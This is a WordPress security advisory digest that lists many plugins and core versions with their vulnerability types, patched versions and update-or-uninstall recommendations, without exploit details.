Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.17.3
Recommended Action: Update to version 2.17.3, or a newer patched version

Plugin: MainWP WordPress SEO Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.3
Recommended Action: Update to version 4.0.3, or a newer patched version

Plugin: Captcha

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: Registration Forms – User Registration Forms, Invitation-Based Registrations, Front-end User Profile, Login Form & Content Restriction

Vulnerability: SQL Injection
Patched Version: 3.0.10
Recommended Action: Update to version 3.0.10, or a newer patched version

Plugin: Sendit WP Newsletter

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Bugs Go Viral : Facebook Promotion Generator

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Subscribe to Comments

Vulnerability: Local File Inclusion
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: WP Site Protector

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MainWP Staging Extension

Vulnerability: Missing Authorization to Arbitrary Plugin Activation
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 5.1.8
Recommended Action: Update to version 5.1.8, or a newer patched version

Plugin: Stock in & out

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Voting Record

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Accordion – Multiple Accordion or FAQs Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via ‘license’ parameter
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: Kraken.io Image Optimizer

Vulnerability: Missing Authorization to Authenticated (Subscriber+) Plugin Options Update
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Easy Digital Downloads – Recurring Payments

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: Download Manager

Vulnerability: IP Blocking Bypass
Patched Version: 3.2.50
Recommended Action: Update to version 3.2.50, or a newer patched version

Plugin: Local Development

Vulnerability: Cross-Site Request Forgery to Settings Update
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: Page Builder: KingComposer – Free Drag and Drop page builder by King-Theme

Vulnerability: Authenticated Arbitrary Profile Creation and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: //// WP BORN BABIES PLUGIN ///

Vulnerability: Authenticated (Contributor+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WCP Contact Form

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Superior FAQ

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Analytics by BestWebSoft – Google Analytics Dashboard and Statistic Plugin for WordPress

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Advance WordPress Search Plugin

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 1.1.5
Recommended Action: Update to version 1.1.5, or a newer patched version

Plugin: Neon text

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: WCFM Marketplace – Multivendor Marketplace for WooCommerce

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.6.3
Recommended Action: Update to version 3.6.3, or a newer patched version

Plugin: Image Gallery – Responsive Photo Gallery

Vulnerability: Responsive Photo Gallery <= 1.0.7
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Video Downloader for TikTok

Vulnerability: Directory Traversal
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Realty by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.0
Recommended Action: Update to version 1.1.0, or a newer patched version

Plugin: Markup (JSON-LD) structured in schema.org

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Content Repeater – Custom Posts Simplified

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Modern Events Calendar Lite

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 5.22.2
Recommended Action: Update to version 5.22.2, or a newer patched version

Plugin: Duplicator Pro

Vulnerability: Directory Traversal
Patched Version: 3.8.7.1
Recommended Action: Update to version 3.8.7.1, or a newer patched version

Plugin: Tweeple

Vulnerability: Reflected Cross-Site Scripting via id
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Nmedia WordPress Member Conversation

Vulnerability: Arbitrary File Upload
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Authenticated (Author+) SQL Injection
Patched Version: 17.0.5
Recommended Action: Update to version 17.0.5, or a newer patched version

Core: WordPress

Vulnerability: Privilege Escalation via XML-RPC
Patched Version: 3.7.35
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.35, 3.8.35, 3.9.33, 4.0.32, 4.1.32, 4.2.29, 4.3.25, 4.4.24, 4.5.23, 4.6.20, 4.7.19, 4.8.15, 4.9.16, 5.0.11, 5.1.7, 5.2.8, 5.3.5, 5.4.3, 5.5.2

Plugin: Variation Swatches for WooCommerce

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.62
Recommended Action: Update to version 1.0.62, or a newer patched version

Plugin: PixelYourSite – Your smart PIXEL (TAG) & API Manager

Vulnerability: Cross-Site Request Forgery
Patched Version: 9.3.1
Recommended Action: Update to version 9.3.1, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Upload
Patched Version: 2.8.6
Recommended Action: Update to version 2.8.6, or a newer patched version

Plugin: Image Gallery with Slideshow Plugin

Vulnerability: SQL Injection via selectMulGallery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Count per Day

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Search & Filter

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.2.16
Recommended Action: Update to version 1.2.16, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Remote Code Execution
Patched Version: 1.3
Recommended Action: Update to version 1.3, or a newer patched version

Plugin: Theme Test Drive

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.9.1
Recommended Action: Update to version 2.9.1, or a newer patched version

Plugin: User Feedback – Create Interactive Feedback Form, User Surveys, and Polls in Seconds

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.0.8
Recommended Action: Update to version 1.0.8, or a newer patched version

Plugin: Answer My Question

Vulnerability: Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Perfect Images (Manage Image Sizes, Thumbnails, Replace, Retina)

Vulnerability: Cross-Site Scripting
Patched Version: 5.2.3
Recommended Action: Update to version 5.2.3, or a newer patched version

Plugin: mTouch Quiz

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.1.3
Recommended Action: Update to version 3.1.3, or a newer patched version

Plugin: Travel Light

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Qe SEO Handyman

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.40
Recommended Action: Update to version 2.0.40, or a newer patched version

Core: WordPress

Vulnerability: Authenticated (Editor+) Stored Cross-Site Scripting via Comments
Patched Version: 3.7.40
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.40, 3.8.40, 3.9.38, 4.0.37, 4.1.37, 4.2.34, 4.3.30, 4.4.29, 4.5.28, 4.6.25, 4.7.25, 4.8.21, 4.9.22, 5.0.18, 5.1.15, 5.2.17, 5.3.14, 5.4.12, 5.5.11, 5.6.10, 5.7.8, 5.8.6, 5.9.5, 6.0.3

Plugin: CM Ad Changer – Ad Manager and Ad Server

Vulnerability: Cross-Site Scripting
Patched Version: 1.7.6
Recommended Action: Update to version 1.7.6, or a newer patched version

Plugin: Return and Warranty Management System for WooCommerce

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Top 10 – WordPress Popular posts by WebberZone

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Blocks
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Job Board by BestWebSoft

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 1.0.1
Recommended Action: Update to version 1.0.1, or a newer patched version

Plugin: Cherry Plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: oAuth Twitter Feed for Developers

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: User Photo

Vulnerability: Cross-Site Scripting
Patched Version: 0.9.5.2
Recommended Action: Update to version 0.9.5.2, or a newer patched version

Plugin: Feedweb

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: WordPress Automatic Plugin

Vulnerability: Cross-Site Request Forgery to SQL Injection
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: FluentSMTP – WP SMTP Plugin with Amazon SES, SendGrid, MailGun, Postmark, Google and Any SMTP Provider

Vulnerability: Unauthenticated Stored Cross-Site Scripting via Email Subject
Patched Version: 2.2.5
Recommended Action: Update to version 2.2.5, or a newer patched version

Plugin: Newsletter – Send awesome emails from WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 7.6.9
Recommended Action: Update to version 7.6.9, or a newer patched version

Plugin: Check & Log Email – Easy Email Testing & Mail logging

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.0.4
Recommended Action: Update to version 1.0.4, or a newer patched version

Plugin: Import Legacy Media

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pricing Tables WordPress Plugin – Easy Pricing Tables

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.2.3
Recommended Action: Update to version 3.2.3, or a newer patched version

Plugin: Royal Elementor Addons and Templates

Vulnerability: Insufficient Access Control to Template Kit Import
Patched Version: 1.3.60
Recommended Action: Update to version 1.3.60, or a newer patched version

Plugin: Contact Form Generator : Creative form builder for WordPress

Vulnerability: Authenticated (Contributor+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Simple Events Calendar

Vulnerability: Authenticated SQL Injection
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: Floating Div

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Swatchly – WooCommerce Variation Swatches for Products (product attributes: Image swatch, Color swatches, Label swatches)

Vulnerability: Cross-Site Request Forgery via plugin_activation
Patched Version: 1.2.1
Recommended Action: Update to version 1.2.1, or a newer patched version

Plugin: JS Help Desk – The Ultimate Help Desk & Support Plugin

Vulnerability: Authenticated (Administrator+) Arbitrary File Upload
Patched Version: 2.7.8
Recommended Action: Update to version 2.7.8, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: LearnPress – WordPress LMS Plugin

Vulnerability: Unauthenticated PHP Object Injection
Patched Version: 4.1.7.2
Recommended Action: Update to version 4.1.7.2, or a newer patched version

Plugin: Contact Form 7 – Dynamic Text Extension

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Smart Slideshow

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Email

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 1.3.12
Recommended Action: Update to version 1.3.12, or a newer patched version

Plugin: EMC2 Custom Help Videos

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gallery – Image and Video Gallery with Thumbnails

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form by Bit Form: Multi Step Form, Calculation Contact Form, Payment Contact Form & Custom Contact Form builder

Vulnerability: Unauthenticated Arbitrary File Upload to Remote Code Execution
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Connect Matomo (WP-Matomo, WP-Piwik)

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.0.29
Recommended Action: Update to version 1.0.29, or a newer patched version

Plugin: Quick Restaurant Menu

Vulnerability: Insecure Direct Object Reference
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: WP Meta and Date Remover

Vulnerability: Cross-Site Request Forgery via updateSettings
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: DB Backup

Vulnerability: Directory Traversal
Patched Version: 5.0
Recommended Action: Update to version 5.0, or a newer patched version

Plugin: miniOrange Social Login and Register (Discord, Google, Twitter, LinkedIn)

Vulnerability: Cross-Site Request Forgery
Patched Version: 7.5.15
Recommended Action: Update to version 7.5.15, or a newer patched version

Plugin: Gallery Metabox

Vulnerability: Missing Authorization via gallery_remove
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Poll Maker – Versus Polls, Anonymous Polls, Image Polls

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.7.1
Recommended Action: Update to version 4.7.1, or a newer patched version

Plugin: Porto Theme – Functionality

Vulnerability: Functionality <= 2.11.1
Patched Version: 2.12.1
Recommended Action: Update to version 2.12.1, or a newer patched version

Plugin: CM Download Manager – Document and File Management

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: 2.0.7
Recommended Action: Update to version 2.0.7, or a newer patched version

Plugin: IP Ban

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Backup and Restore WordPress – Backup Plugin

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.9.1
Recommended Action: Update to version 1.9.1, or a newer patched version

Plugin: All in One Invite Codes

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.15
Recommended Action: Update to version 1.0.15, or a newer patched version

Plugin: CC Custom Taxonomy

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: peepso-photos

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: 6.3.1.0
Recommended Action: Update to version 6.3.1.0, or a newer patched version

Plugin: CF7 Google Sheets Connector

Vulnerability: Unauthenticated Sensitive Information Exposure via Debug Log
Patched Version: 5.0.6
Recommended Action: Update to version 5.0.6, or a newer patched version

Plugin: 404 Solution

Vulnerability: Sensitive Information Exposure
Patched Version: 2.33.1
Recommended Action: Update to version 2.33.1, or a newer patched version

Plugin: Youtube shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: WP Terms Popup – Terms and Conditions and Privacy Policy WordPress Popups

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.6.1
Recommended Action: Update to version 2.6.1, or a newer patched version

Plugin: OAuth Single Sign On – SSO (OAuth Client)

Vulnerability: Authentication Bypass
Patched Version: 6.22.6
Recommended Action: Update to version 6.22.6, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Sensitive Information Disclosure
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Formidable Forms – Contact Form Plugin, Survey, Quiz, Payment, Calculator Form & Custom Form Builder

Vulnerability: Missing Authorization Checks
Patched Version: 2.0.22
Recommended Action: Update to version 2.0.22, or a newer patched version

Core: WordPress

Vulnerability: SQL Injection
Patched Version: 1.5.1
Recommended Action: Update to version 1.5.1, or a newer patched version

Plugin: Booking calendar, Appointment Booking System

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: Commenter Emails

Vulnerability: Unauthenticated CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GiveWP – Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Scripting
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: PDF Builder for WooCommerce. Create invoices,packing slips and more

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.104
Recommended Action: Update to version 1.2.104, or a newer patched version

Plugin: Antispam Bee

Vulnerability: IP Address Spoofing via get_client_ip
Patched Version: 2.11.4
Recommended Action: Update to version 2.11.4, or a newer patched version

Plugin: Joy Of Text Lite – SMS messaging for WordPress.

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.3.1
Recommended Action: Update to version 2.3.1, or a newer patched version

Plugin: WPS Cleaner

Vulnerability: Missing Authorization Checks
Patched Version: 1.4.5
Recommended Action: Update to version 1.4.5, or a newer patched version

Plugin: Malware Scanner

Vulnerability: IP Spoofing
Patched Version: 4.7.2
Recommended Action: Update to version 4.7.2, or a newer patched version

Plugin: Similar Posts – Best Related Posts Plugin for WordPress

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: 360 Product Rotation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: WP Private Content Plus

Vulnerability: Unauthenticated Settings Change
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Filter Portfolio Gallery

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Video Thumbnails

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Integration for WooCommerce and Zoho CRM, Books, Invoice, Inventory, Bigin

Vulnerability: Open Redirect via setup_plugin
Patched Version: 1.3.7
Recommended Action: Update to version 1.3.7, or a newer patched version

Plugin: Photos, Files, YouTube, Twitter, Instagram, TikTok, Ecommerce Contest Gallery – Upload, Vote, Sell via PayPal, Social Share Buttons

Vulnerability: Cross-Site Request Forgery
Patched Version: 10.4.5
Recommended Action: Update to version 10.4.5, or a newer patched version

Plugin: Admin CSS MU

Vulnerability: Server-Side Request Forgery
Patched Version: 2.7
Recommended Action: Update to version 2.7, or a newer patched version

Plugin: Contact Form by WD – responsive drag & drop contact form builder tool

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Slider a SlidersPack – Image Slider, Post Slider, ACF Gallery Slider

Vulnerability: Missing Authorization via wp_spaios_save_attachment_data
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Code Injection
Patched Version: 5.6
Recommended Action: Update to version 5.6, or a newer patched version

Plugin: Arigato Autoresponder and Newsletter

Vulnerability: Cross-Site Scripting
Patched Version: 2.5.1.9
Recommended Action: Update to version 2.5.1.9, or a newer patched version

Plugin: NitroPack – Caching & Speed Optimization for Core Web Vitals, Defer CSS & JS, Lazy load Images and CDN

Vulnerability: Missing Authorization via multiple AJAX functions
Patched Version: 1.10.0
Recommended Action: Update to version 1.10.0, or a newer patched version

Plugin: SendPress Newsletters

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Statistics – The Most Popular Privacy-Friendly Analytics Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 13.2.0
Recommended Action: Update to version 13.2.0, or a newer patched version

Plugin: Coupon Affiliates – Affiliate Plugin for WooCommerce

Vulnerability: Not specified; the entry lists only the affected versions (Coupon Affiliates < 4.16.4.5)
Patched Version: 4.16.4.5
Recommended Action: Update to version 4.16.4.5, or a newer patched version

Plugin: JS & CSS Script Optimizer

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: amr users

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 4.59.4
Recommended Action: Update to version 4.59.4, or a newer patched version

Plugin: Chat Widget: Customer Support Button with SMS Call Button, Click to Chat Messenger, Live Chat Support Chat Button – Bit Assist

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.1.9
Recommended Action: Update to version 1.1.9, or a newer patched version

Plugin: SmokeSignal

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: eRocket

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: Tickera – WordPress Event Ticketing

Vulnerability: Cross-Site Request Forgery to Plugin Data Deletion & Settings Changes
Patched Version: 3.5.1.0
Recommended Action: Update to version 3.5.1.0, or a newer patched version

Plugin: UserPro – Community and User Profile WordPress Plugin

Vulnerability: Cross-Site Request Forgery to PHP Object Injection
Patched Version: 5.1.1
Recommended Action: Update to version 5.1.1, or a newer patched version

Plugin: WP Popup Builder – Popup Forms and Marketing Lead Generation

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Yoast SEO

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.8.0
Recommended Action: Update to version 5.8.0, or a newer patched version

Plugin: WP Backup+

Vulnerability: Sensitive Information Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Patreon WordPress

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login

Vulnerability: Authentication Bypass
Patched Version: 5.0.1.8
Recommended Action: Update to version 5.0.1.8, or a newer patched version

Plugin: ToolBar to Share

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SE HTML5 Album Audio Player

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Remote Code Execution
Patched Version: 1.5.2
Recommended Action: Update to version 1.5.2, or a newer patched version

Plugin: DMSGuestbook

Vulnerability: Cross-Site Scripting
Patched Version: 1.9.0
Recommended Action: Update to version 1.9.0, or a newer patched version

Plugin: Team

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP-Board

Vulnerability: Authenticated (Admin+) SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: TreePress – Easy Family Trees & Ancestor Profiles

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via ‘post_title’ parameter
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Safe SVG

Vulnerability: Content-Type Bypass
Patched Version: 1.9.10
Recommended Action: Update to version 1.9.10, or a newer patched version

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 5.5.0
Recommended Action: Update to version 5.5.0, or a newer patched version

Plugin: WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 8.3.5
